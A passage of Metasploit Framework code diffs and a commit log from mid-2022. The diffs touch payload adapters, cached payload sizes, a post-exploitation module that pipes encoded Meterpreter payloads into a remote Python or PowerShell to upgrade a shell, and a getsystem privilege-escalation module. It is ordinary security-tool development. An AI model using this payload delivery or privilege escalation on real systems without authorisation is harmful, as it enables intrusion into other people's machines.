+    opts[:arch] ||= module_info['AdaptedArch']
    payload = super

    cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
  end

+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
  def generate_payload_uuid(conf = {})
    conf[:arch] ||= module_info['AdaptedArch']
    conf[:platform] ||= module_info['AdaptedPlatform']
    super
  end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end
@@ -4,7 +4,7 @@
 ##

 module MetasploitModule
-  CachedSize = 863
+  CachedSize = 867

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions
@@ -7,7 +7,7 @@

 module MetasploitModule

-  CachedSize = 34792
+  CachedSize = 34854

  include Msf::Payload::Single
  include Msf::Payload::Php::ReverseTcp
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 117045
+  CachedSize = 117057

  include Msf::Payload::Single
  include Msf::Payload::Python
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 117037
+  CachedSize = 117049

  include Msf::Payload::Single
  include Msf::Payload::Python
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 117037
+  CachedSize = 117049

  include Msf::Payload::Single
  include Msf::Payload::Python
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 116945
+  CachedSize = 116957

  include Msf::Payload::Single
  include Msf::Payload::Python
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 175174
+  CachedSize = 175686

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 175174
+  CachedSize = 175686

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 176220
+  CachedSize = 176732

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 176220
+  CachedSize = 176732

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 175174
+  CachedSize = 175686

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
@@ -6,7 +6,7 @@

 module MetasploitModule

-  CachedSize = 175174
+  CachedSize = 175686

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
@@ -45,11 +45,17 @@ class MetasploitModule < Msf::Post
      OptString.new('BOURNE_PATH',
                    [false, 'Remote path to drop binary']),
      OptString.new('BOURNE_FILE',
-                    [false, 'Remote filename to use for dropped binary'])
+                    [false, 'Remote filename to use for dropped binary']),
+      OptInt.new('COMMAND_TIMEOUT',
+                 [true, 'How long to wait (in seconds) for a result when executing a command on the remote machine.', 15]),
    ])
    deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
  end

+  def command_timeout
+    datastore['COMMAND_TIMEOUT']
+  end
+
  # Run method for when run command is issued
  def run
    print_status("Upgrading session ID: #{datastore['SESSION']}")
@@ -118,7 +124,7 @@ class MetasploitModule < Msf::Post
        lplat = [Msf::Platform::OSX]
        larch = [ARCH_X64]
        vprint_status('Platform: OS X')
-      elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
+      elsif remote_python_binary
        # Generic fallback for OSX, Solaris, Linux/ARM
        platform = 'python'
        payload_name = 'python/meterpreter/reverse_tcp'
@@ -176,7 +182,7 @@ class MetasploitModule < Msf::Post
          cmd_exec("echo. | #{cmd_psh_payload(payload_data, psh_arch, psh_opts)}")
        else
          psh_opts[:remove_comspec] = true
-          cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts), nil, 15, { 'Channelized' => false })
+          cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts), nil, command_timeout, { 'Channelized' => false })
        end
      else
        print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
@@ -186,11 +192,11 @@ class MetasploitModule < Msf::Post
      end
    when 'python'
      vprint_status('Transfer method: Python')
-      cmd_exec("echo \"#{payload_data}\" | python")
+      cmd_exec("echo \"#{payload_data}\" | #{remote_python_binary}", nil, command_timeout, { 'Channelized' => false })
    when 'osx'
      vprint_status('Transfer method: Python [OSX]')
      payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload_data, {})
-      cmd_exec("echo \"#{payload_data}\" | python & disown")
+      cmd_exec("echo \"#{payload_data}\" | #{remote_python_binary} & disown", nil, command_timeout, { 'Channelized' => false })
    else
      vprint_status('Transfer method: Bourne shell [fallback]')
      exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
@@ -204,6 +210,29 @@ class MetasploitModule < Msf::Post
    return nil
  end

+  #
+  # Get the Python binary from the remote machine, if any, by running
+  # a series of channelized `cmd_exec` calls.
+  # @return String/nil A string if a Python binary can be found, else nil.
+  #
+  def remote_python_binary
+    return @remote_python_binary if defined?(@remote_python_binary)
+
+    python_exists_regex = /Python (2|3)\.(\d)/
+
+    if cmd_exec('python3 -V 2>&1') =~ python_exists_regex
+      @remote_python_binary = 'python3'
+    elsif cmd_exec('python -V 2>&1') =~ python_exists_regex
+      @remote_python_binary = 'python'
+    elsif cmd_exec('python2 -V 2>&1') =~ python_exists_regex
+      @remote_python_binary = 'python2'
+    else
+      @remote_python_binary = nil
+    end
+
+    @remote_python_binary
+  end
+
  def transmit_payload(exe, platform)
    #
    # Generate the stager command array
@@ -249,22 +278,27 @@ class MetasploitModule < Msf::Post
      #
      sent = 0
      aborted = false
-      cmds.each do |cmd|
-        ret = cmd_exec(cmd)
-        if !ret
-          aborted = true
-        else
-          ret.strip!
-          aborted = true if !ret.empty? && ret !~ /The process tried to write to a nonexistent pipe./
-        end
-        if aborted
-          print_error('Error: Unable to execute the following command: ' + cmd.inspect)
-          print_error('Output: ' + ret.inspect) if ret && !ret.empty?
-          break
+      cmds.each.with_index do |cmd, i|
+        # The last command should be fire-and-forget, otherwise issues occur where the original session waits
+        # for an unlimited amount of time for the newly spawned session to exit.
+        wait_for_cmd_result = i + 1 < cmds.length
+        # Note that non-channelized cmd_exec calls currently return an empty string
+        ret = cmd_exec(cmds.last, nil, command_timeout, { 'Channelized' => wait_for_cmd_result })
+        if wait_for_cmd_result
+          if !ret
+            aborted = true
+          else
+            ret.strip!
+            aborted = true if !ret.empty? && ret !~ /The process tried to write to a nonexistent pipe./
+          end
+          if aborted
+            print_error('Error: Unable to execute the following command: ' + cmd.inspect)
+            print_error('Output: ' + ret.inspect) if ret && !ret.empty?
+            break
+          end
        end

        sent += cmd.length
-
        progress(total_bytes, sent)
      end
    rescue ::Interrupt
@@ -28,12 +28,22 @@ class MetasploitModule < Msf::Post
              priv_elevate_getsystem
            ]
          }
+        },
+        'Notes' => {
+          'AKA' => [
+            'Named Pipe Impersonation',
+            'Token Duplication',
+            'RPCSS',
+            'PrintSpooler',
+            'EFSRPC',
+            'EfsPotato'
+          ]
        }
      )
    )

    register_options([
-      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-5), otherwise try them all", 0])
+      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
    ])
  end

--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Metasploit	e2bfef3876	automatic module_metadata_base.json update	2022-06-23 14:36:44 -05:00
Spencer McIntyre	fb3d349969	Land #16676 , Add 6th `getsystem` technique	2022-06-23 15:14:52 -04:00
Christophe De La Fuente	df69ffeaae	Update metasploit payloads to 2.0.94	2022-06-23 18:46:51 +02:00
Christophe De La Fuente	369c23a90b	Revert to TECHNIQUE datastore option for backwards compatibility	2022-06-23 18:43:18 +02:00
Metasploit	fc2efc66ae	automatic module_metadata_base.json update	2022-06-21 18:22:22 -05:00
bwatters	c7820048cd	Land #16680 , Add a Windows target for Confluence Merge branch 'land-16680' into upstream-master	2022-06-21 17:56:32 -05:00
Metasploit	96fc98eb7d	automatic module_metadata_base.json update	2022-06-21 10:09:46 -05:00
space-r7	7983f878a8	Land #16597 , psh cmd adapter fix for encrypt shell	2022-06-21 09:47:05 -05:00
adfoster-r7	98b2234cab	Land #16692 , update doc links	2022-06-19 23:46:42 +01:00
Alexandre ZANNI	1b8b37d313	update links for all other templates	2022-06-19 01:57:05 +02:00
Alexandre ZANNI	0e61db7e29	issue template: update doc links	2022-06-19 01:35:29 +02:00
Grant Willcox	b10386ba08	Land #16650 , Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation	2022-06-17 14:58:22 -05:00
Grant Willcox	b817a1f8ee	Update test module to properly handle multiline return values so that we can properly test things like dumping file content	2022-06-17 13:35:32 -05:00
Grant Willcox	5dd68b23ed	Fix some nil issues in SQLi test module	2022-06-16 16:58:33 -05:00
Redouane NIBOUCHA	d47d1bc259	Remove newlines from base64 output on MySQL also	2022-06-17 00:51:52 +02:00
Metasploit	3f433b0c24	Bump version of framework to 6.2.4	2022-06-16 12:09:14 -05:00
Grant Willcox	be45688dbc	Land #16602 , Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb	2022-06-16 10:59:35 -05:00
Grant Willcox	f0428bfa15	Land #16627 , Add some error handling to update_payload_cache_size script	2022-06-16 10:25:44 -05:00
Metasploit	1c62a3c859	automatic module_metadata_base.json update	2022-06-16 09:49:34 -05:00
Grant Willcox	18e58bc989	Land #16679 , Fix missing and incomplete specs	2022-06-16 09:24:32 -05:00
Grant Willcox	c94f22cebe	Add in fixes from discussion and also update documentation to correctly note what functions can raise	2022-06-15 19:28:31 -05:00
Spencer McIntyre	a96bc36d9c	Update the docs with the Windows target	2022-06-15 17:24:44 -04:00
Spencer McIntyre	339114e3c0	Check the target platform for compatibility	2022-06-15 17:11:56 -04:00
Jeffrey Martin	bcac5a1274	add missing payload tests	2022-06-15 14:34:08 -05:00
Jeffrey Martin	9b7da41e3d	update missing check spec to mock RACK_ENV The spec result has a precondition in the expectations. The RACK_ENV must be `development` and causes the test to fail based on test execution order in scenarios where a previous test set a different expectation in the env.	2022-06-15 14:29:21 -05:00
Spencer McIntyre	dc3596525e	Add Windows targets	2022-06-15 15:23:34 -04:00
Christophe De La Fuente	35e535415a	getsytem module: use ACTION instead of TECHNIQUE datastore option	2022-06-14 15:31:33 +02:00
Christophe De La Fuente	f804a58970	Add `getsystem` technique 6 Named Pipe Impersonation (Efs variant - AKA EfsPotato)	2022-06-14 15:31:15 +02:00
bwatters	be48b1481a	Land #16654 , Add named pipe pivot documentation Merge branch 'land-16654' into upstream-master	2022-06-13 14:22:47 -05:00
adfoster-r7	1836cf3a9c	Update pivot docs for reverse named pipe	2022-06-13 17:25:22 +01:00
Metasploit	f39bc72fc4	automatic module_metadata_base.json update	2022-06-13 10:54:46 -05:00
bwatters	f6bd8fd020	Land #16571 , Vcenter offline mdb extract Merge branch 'land-16571' into upstream-master	2022-06-13 10:32:07 -05:00
Grant Willcox	47fcf541e3	Land #16667 , Weekly dependency updates for Gemfile.lock	2022-06-10 12:40:48 -05:00
Metasploit	ebe6f89bdf	automatic module_metadata_base.json update	2022-06-10 09:09:36 -05:00
Grant Willcox	f1020289fa	Land #16666 , Correctly format the notes sections	2022-06-10 08:48:13 -05:00
Grant Willcox	a075c676a6	Fix spacing issue	2022-06-10 08:47:41 -05:00
Metasploit	496037c45e	Weekly dependency updates for Gemfile.lock	2022-06-10 08:17:58 -05:00
dwelch-r7	3f06e237b7	Correctly format the notes sections	2022-06-10 14:01:57 +01:00
Grant Willcox	572ee18ad4	Land #16665 - Fix random compile c tool	2022-06-10 07:56:39 -05:00
adfoster-r7	417f34e744	Fix random compile c tool	2022-06-10 11:28:42 +01:00
bwatters	4aa150bbe5	Update pivot docs for reverse named pipe	2022-06-09 15:22:09 -05:00
Metasploit	f2e1dca061	Bump version of framework to 6.2.3	2022-06-09 12:03:55 -05:00
Grant Willcox	fd5e483b3c	Land #16662 , Add faraday retry gem dependency	2022-06-09 09:41:47 -05:00
bwatters	785a176240	Move logging and error printing to the end; return proper status	2022-06-09 09:18:11 -05:00
kalidor	b292586fb3	Avoid exception 'TypeError exception class/object expected'	2022-06-09 11:58:01 +02:00
adfoster-r7	f4f9580412	Add faraday retry gem dependency	2022-06-09 02:09:28 +01:00
Grant Willcox	63822f6e37	Land #16651 , [SQLi library] Ensure the encoder is always used in the #test_vulnerable methods	2022-06-08 17:15:22 -05:00
Redouane NIBOUCHA	88036a7f1f	Check for nil before using the decoder in test_vulnerable	2022-06-08 22:00:03 +02:00
Metasploit	9e3b1caf16	automatic module_metadata_base.json update	2022-06-08 13:35:28 -05:00
Jack Heysel	67ea2bc23c	Land #16630 Fix duplicate ntlm hash storage Net-NTLM (v1 and v2) hashes were being duplicated when stored in the database due to the unique data in the challenge dispite being the same. This fixes that issue	2022-06-08 14:07:34 -04:00
jheysel-r7	1a7cbe5b4f	Update lib/msf/core/exploit/remote/smb/server/hash_capture.rb	2022-06-08 13:45:57 -04:00
Metasploit	365efba76b	automatic module_metadata_base.json update	2022-06-08 12:15:23 -05:00
Grant Willcox	12cc1c871d	Land #16661 , Add SAN support to impersonate_ssl module	2022-06-08 11:54:05 -05:00
Grant Willcox	ab322d9318	Add minor review improvements for code readability and future travelers	2022-06-08 11:53:42 -05:00
Dan Staples	a55aa8492c	Add SAN support to impersonate_ssl module	2022-06-08 11:22:06 -04:00
Metasploit	e957e0ea80	automatic module_metadata_base.json update	2022-06-07 16:20:37 -05:00
bwatters	3875db78ae	Land #16644 , Add Exploit for CVE-2022-26134 (Confluence RCE) Merge branch 'land-16644' into upstream-master	2022-06-07 16:00:37 -05:00
Grant Willcox	a983bbd8ba	Land #16615 , Solicited multicast-address creation bugfix	2022-06-07 14:41:52 -05:00
Grant Willcox	5e69de43a8	Land #16645 , Weekly dependency updates for Gemfile.lock	2022-06-07 11:58:51 -05:00
Metasploit	9b180c9e14	Weekly dependency updates for Gemfile.lock	2022-06-07 11:31:32 -05:00
jheysel-r7	2b99967d0c	Merge branch 'master' into fix/duplicate-netntlm	2022-06-07 11:42:51 -04:00
Metasploit	5880a0dcea	automatic module_metadata_base.json update	2022-06-07 09:19:11 -05:00
Grant Willcox	8584014af2	Land #16583 , Bump payloads version to 2.0.93	2022-06-07 08:58:56 -05:00
Spencer McIntyre	1a06f69f95	Works through v7.18 now too	2022-06-06 22:03:21 -04:00
Spencer McIntyre	45c646afea	Refactor #encode_ognl	2022-06-06 18:15:44 -04:00
Spencer McIntyre	2c0e034a18	Fix a couple of typos	2022-06-06 18:14:05 -04:00
Redouane NIBOUCHA	5331c343a0	Use the encoder in all the #test_vulnerable methods from the common class	2022-06-06 23:13:26 +02:00
Redouane NIBOUCHA	6d9c789f4d	Add method #read_from_file for MSSQL and PostgreSQL, and update the MySQL #read_from_file method	2022-06-06 23:07:25 +02:00
Metasploit	1bb93ddfd2	automatic module_metadata_base.json update	2022-06-06 15:02:58 -05:00
bwatters	c751ef46c9	Land #16635 , Add 0-day MSWord RCE #Follina CVE-2022-30190 Merge branch 'land-16635' into upstream-master	2022-06-06 14:41:31 -05:00
bwatters	24a0e7622d	Land #16653 , Fix smb named pipe pivot crash Merge branch 'land-16653' into upstream-master	2022-06-06 14:33:07 -05:00
Metasploit	4dd6b936b6	automatic module_metadata_base.json update	2022-06-06 12:25:38 -05:00
Grant Willcox	50ba5f580c	Land #16643 - Fix exploits/multi/http/php_fpm_rce for ruby 3	2022-06-06 12:04:36 -05:00
adfoster-r7	09f75c65dc	Add named pipe pivot documentation	2022-06-06 15:44:36 +01:00
adfoster-r7	6e9765992c	Fix smb named pipe pivot crash	2022-06-06 13:00:42 +01:00
Spencer McIntyre	1aec2e8649	Note version in the docs	2022-06-03 18:29:28 -04:00
Spencer McIntyre	f55334f0fe	Add version detection	2022-06-03 18:26:04 -04:00
Spencer McIntyre	600fba7fa1	Add module docs	2022-06-03 17:26:15 -04:00
Spencer McIntyre	76ec36a091	Remove the Windows targets for now	2022-06-03 16:50:13 -04:00
Spencer McIntyre	29a9ef686a	Finish up a draft of the module	2022-06-03 16:47:02 -04:00
Spencer McIntyre	cd6bbeb0ba	WIP module	2022-06-03 15:27:13 -04:00
Kert Ojasoo	1dc61d02eb	Update php_fpm_rce.rb	2022-06-03 11:23:53 +03:00
Metasploit	e79161c236	Bump version of framework to 6.2.2	2022-06-02 12:05:08 -05:00
Jack Heysel	8ccc1ebf91	Land PR #16628 , Log ntlm_session hashes This PR fixes the logging and storing of NTLM session hashes	2022-06-02 11:20:37 -04:00
Metasploit	6942e0ca0e	automatic module_metadata_base.json update	2022-06-02 08:52:54 -05:00
Christophe De La Fuente	474116d413	Land #16611 , DotCMS File Upload to RCE Module (CVE-2022-26352)	2022-06-02 15:30:10 +02:00
Grant Willcox	44a22ab720	Land #16640 , Patch LDAP for sychronous reads	2022-06-01 16:12:09 -05:00
RAMELLA Sébastien	3ab06461af	fix. second review	2022-06-02 00:58:20 +04:00
RAMELLA Sébastien	dd1814903c	fix. SRVHOST default value	2022-06-02 00:07:15 +04:00
RAMELLA Sébastien	8c19a02835	fix. first review	2022-06-01 20:15:08 +04:00
Metasploit	f036950ea1	automatic module_metadata_base.json update	2022-06-01 10:49:34 -05:00
space-r7	6d3ccab1be	Land #16435 , add Microsoft SQL Server sqli support	2022-06-01 10:27:48 -05:00
jheysel-r7	97caca4f6e	Update modules/exploits/multi/http/dotcms_file_upload_rce.rb Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>	2022-06-01 10:54:02 -04:00
Metasploit	87e7e5c813	automatic module_metadata_base.json update	2022-05-31 11:29:18 -05:00
Jack Heysel	bea4207c62	Land PR #16607 - MyBB RCE Module (CVE-2022-24734) This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application.	2022-05-31 11:59:53 -04:00
Metasploit	3261cd1ee3	automatic module_metadata_base.json update	2022-05-31 05:23:36 -05:00
Christophe De La Fuente	dac355d9cf	Land #16492 , nfs_mount more intelligent mountability	2022-05-31 11:56:19 +02:00
RAMELLA Sébastien	7f89e92da3	add more informations about	2022-05-31 00:12:30 +04:00
Jack Heysel	2c02a607ee	Responded to PR feedback	2022-05-30 14:46:54 -04:00
RAMELLA Sébastien	97921b4ed9	fix chmod 644	2022-05-30 22:11:35 +04:00
RAMELLA Sébastien	dfc226cf5f	add. Supposed 0day MSWord RCE	2022-05-30 21:23:18 +04:00
h00die	c6936bd42f	nfs mount more intelligent	2022-05-30 13:03:03 -04:00
Christophe De La Fuente	b996f5ee49	Fixes from code review	2022-05-30 16:24:18 +02:00
h00die	627605cf82	nfs mount more intelligent	2022-05-30 09:49:24 -04:00
h00die	b8cebe0dbe	nfs mount more intelligent	2022-05-30 09:47:00 -04:00
Spencer McIntyre	adcf45b0ff	Fix the arch in #handle_connection too This fixes an issue with the adated peinject stage which supported both x86 and x64 via a library that checked its own #arch.	2022-05-27 16:42:14 -04:00
Spencer McIntyre	1466506069	Update the docs to be accurate	2022-05-27 14:41:06 -04:00
Spencer McIntyre	a47b3fe694	Don't report duplicate Net-NTLM hashes	2022-05-27 14:13:06 -04:00
Metasploit	b464f97c5e	automatic module_metadata_base.json update	2022-05-27 11:51:08 -05:00
adfoster-r7	a98f9a69c4	Land #16621 , Fix timeout of duplicated sessions	2022-05-27 17:30:56 +01:00
Spencer McIntyre	0c481ed9c9	Patch LDAP for synchronous reads	2022-05-27 10:57:28 -04:00
Spencer McIntyre	1e5f86703f	Report the correct JtR type	2022-05-27 10:16:02 -04:00
Spencer McIntyre	862c6a94a2	Log ntlm_session hashes too Despite being called ntlm_session, these hashes are capable of being cracked as the John 'netntlm' format. Additionally the format is reported as NTLMv1-SSP in similar tools.	2022-05-27 10:07:39 -04:00
bwatters	9d67ce0186	Add some error handling to update_payload_cache_size script	2022-05-27 08:45:10 -05:00
sjanusz	7b75bd6e27	Cache remote Python binary name	2022-05-27 10:21:59 +01:00
Metasploit	a1613d6070	Bump version of framework to 6.2.1	2022-05-26 12:04:57 -05:00
npm-cesium137-io	1d9089f5a0	vcenter_offline_mdb_extract PR verbosity Added verbose output to the RSA and x509 extraction functions for troubleshooting. Changed error handling to just print an error message instead of throwing an exception temporariliy.	2022-05-26 11:52:56 -04:00
sjanusz	17a37a9d4d	Detect more Python binaries & don't run last cmd_exec as channelized	2022-05-25 15:21:40 +01:00
dwelch-r7	5f73401ab7	Bump payloads version	2022-05-24 16:06:42 +01:00
dwelch-r7	a911a9185a	Update cached sizes	2022-05-24 16:04:03 +01:00
dwelch-r7	21a34b2f50	bump payload version	2022-05-24 16:04:03 +01:00
dwelch-r7	0df1f58480	Update cached sizes	2022-05-24 16:04:00 +01:00
dwelch-r7	25e1e5db1f	Bump payloads version to 2.0.92	2022-05-24 16:04:00 +01:00
Jack Heysel	9d9d81a855	Docs update	2022-05-24 10:16:36 -04:00
NikitaKovaljov	c33f284786	change from lambda to line by line logic	2022-05-24 16:24:15 +03:00
Christophe De La Fuente	bac9be956f	Add documentation	2022-05-23 17:27:42 +02:00
Christophe De La Fuente	1f304ef2c4	Add module exploit for MyBB RCE - CVE-2022-24734	2022-05-23 17:27:20 +02:00
NikitaKovaljov	7f9ead454e	bugfix of improper solicited address creation	2022-05-23 15:25:53 +03:00
kalidor	e09169b281	Raise Error::SERVICE_ALREADY_RUNNING	2022-05-20 22:41:27 +02:00
kalidor	677b16e09c	Fix error when service is already running	2022-05-20 22:13:17 +02:00
Jack Heysel	3afb9b2ffe	dotCMS file upload to RCE module	2022-05-20 15:57:22 -04:00
Spencer McIntyre	886f031daa	Set @staged for adapted payloads when necessary	2022-05-19 16:30:54 -04:00
Spencer McIntyre	2d0cdc31e3	Set the correct arch in #generate_stage too	2022-05-19 16:30:54 -04:00
Spencer McIntyre	a8a9b4bbe1	Update the #generate signature to take opts	2022-05-19 16:30:54 -04:00
Spencer McIntyre	08266beac3	Pass around the conf and opts to share the arch	2022-05-19 16:30:54 -04:00
Spencer McIntyre	9a345052b6	Set the arch while generating	2022-05-19 16:30:52 -04:00
Jack Heysel	4f4287eb6b	Module working on linux	2022-05-19 09:37:48 -04:00
npm-cesium137-io	8b502d074f	vcenter_offline_mdb_extract aux module Add new aux module vcenter_offline_mdb_extract for extracting IdP credentials, certificates and keys from a vCenter backup file. Added module documentation.	2022-05-13 15:57:59 -04:00
npm-cesium137-io	ecec8a5993	Clean up unrelated files.	2022-05-13 15:53:40 -04:00
h00die	6f6e7718dd	nfs mount more intelligent	2022-05-08 11:35:59 -04:00
h00die	978dfe9b74	nfs mount more intelligent	2022-05-08 08:48:53 -04:00
Redouane NIBOUCHA	90937e6daa	Address feedback from space-r7	2022-05-06 00:31:20 +02:00
h00die	3b5719ec88	nfs mount more intelligent	2022-04-23 07:11:00 -04:00
h00die	44ab99c89f	nfs mount more intelligent	2022-04-23 07:02:37 -04:00
Redouane NIBOUCHA	87a21bd117	Add the MSSQL injection library	2022-04-22 06:19:36 +02:00
npm-cesium137-io	925df9dc87	Update markup document	2022-04-21 09:41:09 -04:00
npm-cesium137-io	30aaea9350	Add vcenter_forge_saml_token aux module	2022-04-21 09:25:35 -04:00